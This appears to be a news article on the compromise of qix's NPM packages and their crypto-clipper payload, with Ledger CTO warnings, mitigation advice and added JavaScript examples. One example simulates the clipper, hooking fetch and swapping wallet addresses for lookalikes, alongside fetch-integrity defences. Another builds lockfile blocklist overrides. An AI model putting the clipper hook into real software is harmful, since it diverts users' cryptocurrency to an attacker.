Ledger CTO Confirms Massive NPM Supply Chain Attack Targeting JavaScript Ecosystem
A critical supply chain attack has shaken the JavaScript world after the NPM account of a highly respected developer, known under the handle qix, was compromised. According to reports confirmed by Charles Guillemet, Chief Technology Officer of Ledger, the attack puts the entire JavaScript ecosystem at risk: the affected packages have been downloaded more than a billion times, so a very large number of applications may have pulled in malicious code.
Dozens of foundational open-source packages maintained by qix, including strip-ansi, color-convert, color-name, error-ex, has-ansi, and is-core-module, were reported to have had malicious versions published. These utilities sit at the bottom of countless dependency chains, so virtually any modern JavaScript project that installed or updated dependencies while the malicious versions were live may have pulled them in transitively, without ever depending on them directly.
The attack is sophisticated. The malicious patch versions carried obfuscated code designed to intercept and manipulate network requests. At its core, the payload is a crypto-clipper: it replaces legitimate wallet addresses with attacker-controlled ones, letting the attacker silently divert funds from unsuspecting users.
How the Attack Works
Investigations revealed a two-pronged strategy.
- Passive interception: The malware hooks browser functions such as fetch and XMLHttpRequest. It scans outgoing and incoming request data for cryptocurrency addresses and swaps them with attacker-controlled addresses. Each replacement is chosen to look similar to the original, so a casual glance at the address will not reveal the swap.
- Active manipulation: When a browser wallet is detected, the code goes further. It hooks wallet transaction calls such as eth_sendTransaction, replaces the recipient address with a malicious one, and forwards the altered transaction to the wallet for signing. Users who do not carefully inspect the transaction details shown by the wallet risk unknowingly sending funds to the attacker.
The scope is massive. These libraries together see hundreds of millions of weekly downloads, which makes the blast radius one of the largest of any supply chain attack seen in open source.
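To make the passive-interception step concrete, here is an added Node.js example (written for this article, not code from the compromised packages or from Ledger). It simulates a fetch-hooking clipper of the kind described above and then shows two defences a web application can apply: comparing the fetch binding against a reference captured before any dependency code ran, and making the binding non-writable. It assumes EVM-style 0x addresses and models "visually similar" as the attacker-pool entry with the smallest Levenshtein edit distance; the sandbox object standing in for window, the wallet backend reply and the attacker pool are all constructed here.

```javascript
// Added example, not the malware's code: a simulated fetch-hooking clipper of the kind
// described above, plus two checks a page can use to detect or block such a hook.
// Assumptions: EVM-style 0x addresses; "visually similar" is modelled as the attacker-pool
// entry with the smallest Levenshtein distance to the victim's address.
const ETH_ADDR = /0x[0-9a-fA-F]{40}/g;

// Classic single-row Levenshtein edit distance.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, i) => i);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Attacker side: choose the pool address that looks most like the victim's.
function pickLookalike(victim, pool) {
  let best = pool[0];
  let bestDist = Infinity;
  for (const candidate of pool) {
    const d = levenshtein(victim.toLowerCase(), candidate.toLowerCase());
    if (d < bestDist) { best = candidate; bestDist = d; }
  }
  return best;
}

// Attacker side: rewrite every address found in a request or response body.
function clipAddresses(text, pool) {
  return text.replace(ETH_ADDR, (match) => pickLookalike(match, pool));
}

// Attacker side: replace target.fetch with a wrapper that rewrites response bodies.
// Returns true if the hook went in, false if the binding could not be changed.
function installClipper(target, pool) {
  const original = target.fetch;
  const hooked = async function (...args) {
    const res = await original.apply(this, args);
    const body = await res.text();
    return new Response(clipAddresses(body, pool), { status: res.status, headers: res.headers });
  };
  try { target.fetch = hooked; } catch (_) { /* non-writable binding throws in strict mode */ }
  return target.fetch === hooked;
}

// Defence 1: capture fetch before any dependency code runs; compare the binding later.
function makeIntegrityCheck(target) {
  const pristine = target.fetch;
  return () => target.fetch === pristine;
}

// Defence 2: make the binding non-writable so later-loaded code cannot swap it.
function lockFetch(target) {
  Object.defineProperty(target, 'fetch', { value: target.fetch, writable: false, configurable: false });
}

// Constructed demo data: a stand-in for window whose fetch returns a wallet backend's reply.
const VICTIM = '0x' + 'a'.repeat(40);
const ATTACKER_POOL = ['0x' + 'c'.repeat(40), '0xaaaa' + 'b'.repeat(32) + 'aaaa'];
function makeSandbox() {
  return { fetch: async () => new Response(JSON.stringify({ to: VICTIM })) };
}

async function demo() {
  const page = makeSandbox();
  const fetchIntact = makeIntegrityCheck(page);
  console.log('hook installed:', installClipper(page, ATTACKER_POOL)); // true
  console.log('fetch intact:', fetchIntact());                          // false
  const reply = await (await page.fetch('https://wallet.example/tx')).json();
  console.log('recipient seen by the app:', reply.to);                  // the lookalike, not VICTIM

  const locked = makeSandbox();
  lockFetch(locked);
  console.log('hook installed on locked page:', installClipper(locked, ATTACKER_POOL)); // false
}
demo();
```

Both defences only work if they run before any bundled dependency executes, which in practice means an inline script at the top of the page; a hook that is already in place when the reference is captured is indistinguishable from the real function. Locking the binding also breaks legitimate instrumentation (monitoring SDKs, test mocks) that relies on wrapping fetch, so apply it deliberately.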
Warnings from Ledger’s CTO About the Attack
In a public statement on X, Ledger CTO Charles Guillemet warned that users relying on software wallets should immediately halt on-chain transactions until the situation becomes clearer. Hardware wallet users remain safer, but only if they carefully review each transaction before signing.
“If you use a hardware wallet, pay attention to every transaction before signing and you’re safe. If you don’t use one, refrain from making on-chain transactions for now,” Guillemet advised.
🚨 There’s a large-scale supply chain attack in progress: the NPM account of a reputable developer has been compromised. The affected packages have already been downloaded over 1 billion times, meaning the entire JavaScript ecosystem may be at risk.
The malicious payload works…
— Charles Guillemet (@P3b7_) September 8, 2025
He also confirmed that it is still unclear whether the attacker is attempting to steal seed phrases directly from software wallets.
Protecting Yourself
Developers are urged to act immediately:
- Pin known-good versions of the affected packages using the overrides field in package.json, so that transitive copies are forced onto those versions too, then regenerate package-lock.json.
- Use npm ci in build pipelines so that only the exact versions locked in package-lock.json are installed and the build fails if the lock file is out of sync with package.json.
- Audit dependencies regularly with tools such as Snyk or Dependabot.
- Treat every change to package-lock.json with the same scrutiny as application code, since a single lockfile update is all it takes to pull in a malicious release.
Which chains are targeted has not yet been confirmed. Until it is, the prudent assumption is that most or all of them are.
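The first two steps above can be automated. The following Node.js script is an added example (not code from Ledger or from any of the affected projects): it scans a package-lock.json for package@version pairs on a blocklist, covering both the flat "packages" map of lockfile v2/v3 and the nested "dependencies" tree of v1, and builds the package.json overrides that pin every hit, including nested transitive copies, onto a chosen replacement. The lock files, the blocklist and the pin versions are constructed placeholders; substitute the versions published in the official advisory.

```javascript
// Added example, not from any affected project: lockfile scan plus overrides generation.
// All versions below are constructed placeholders, not real compromised or safe releases.

// Yield { name, version, path } for every installed package recorded in the lock file.
function* lockEntries(lock) {
  if (lock.packages) {                                // lockfile v2/v3: flat path -> metadata map
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path === '' || !meta.version) continue;     // "" is the root project itself
      const idx = path.lastIndexOf('node_modules/');  // works for nested and @scoped paths
      yield { name: path.slice(idx + 'node_modules/'.length), version: meta.version, path };
    }
  } else if (lock.dependencies) {                     // lockfile v1: nested dependency tree
    const walk = function* (deps, prefix) {
      for (const [name, meta] of Object.entries(deps)) {
        const path = prefix + 'node_modules/' + name;
        yield { name, version: meta.version, path };
        if (meta.dependencies) yield* walk(meta.dependencies, path + '/');
      }
    };
    yield* walk(lock.dependencies, '');
  }
}

// Return every lock entry whose name@version is on the blocklist.
function findBlocked(lock, blocklist) {
  const hits = [];
  for (const entry of lockEntries(lock)) {
    const bad = blocklist[entry.name];
    if (bad && bad.includes(entry.version)) hits.push(entry);
  }
  return hits;
}

// Build a package.json with an "overrides" entry for every hit, keeping existing overrides.
// npm applies overrides to the whole tree, so nested copies are pinned as well.
function pinHits(pkgJson, hits, pins) {
  const overrides = { ...(pkgJson.overrides || {}) };
  for (const hit of hits) {
    if (!(hit.name in pins)) throw new Error('no pinned replacement for ' + hit.name);
    overrides[hit.name] = pins[hit.name];
  }
  return { ...pkgJson, overrides };
}

// Constructed sample data (placeholder versions).
const BLOCKLIST = { 'strip-ansi': ['99.0.1'], 'color-convert': ['99.0.2'] };
const PINS = { 'strip-ansi': '99.1.0', 'color-convert': '99.1.0' };
const SAMPLE_LOCK_V3 = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app' },
    'node_modules/strip-ansi': { version: '99.0.1' },
    'node_modules/color-convert': { version: '2.0.1' },
    'node_modules/@scope/tool': { version: '1.0.0' },
    'node_modules/wrap-ansi/node_modules/strip-ansi': { version: '99.0.1' },
  },
};
const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    'color-convert': { version: '99.0.2', dependencies: { 'color-name': { version: '1.1.4' } } },
  },
};

const hits = findBlocked(SAMPLE_LOCK_V3, BLOCKLIST);
console.log('blocked entries:', hits.map((h) => h.path + '@' + h.version));
console.log(JSON.stringify(pinHits({ name: 'demo-app' }, hits, PINS), null, 2));
```

In a real repository, load the lock with fs.readFileSync('package-lock.json', 'utf8') and JSON.parse, fail the CI job on any hit, commit the generated overrides, run npm install once to regenerate the lock file, and keep CI on npm ci so that it refuses to drift from what was committed.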
Stay alert. Audit your dependencies. Double-check your transactions. Ledger's official announcement can be found here.
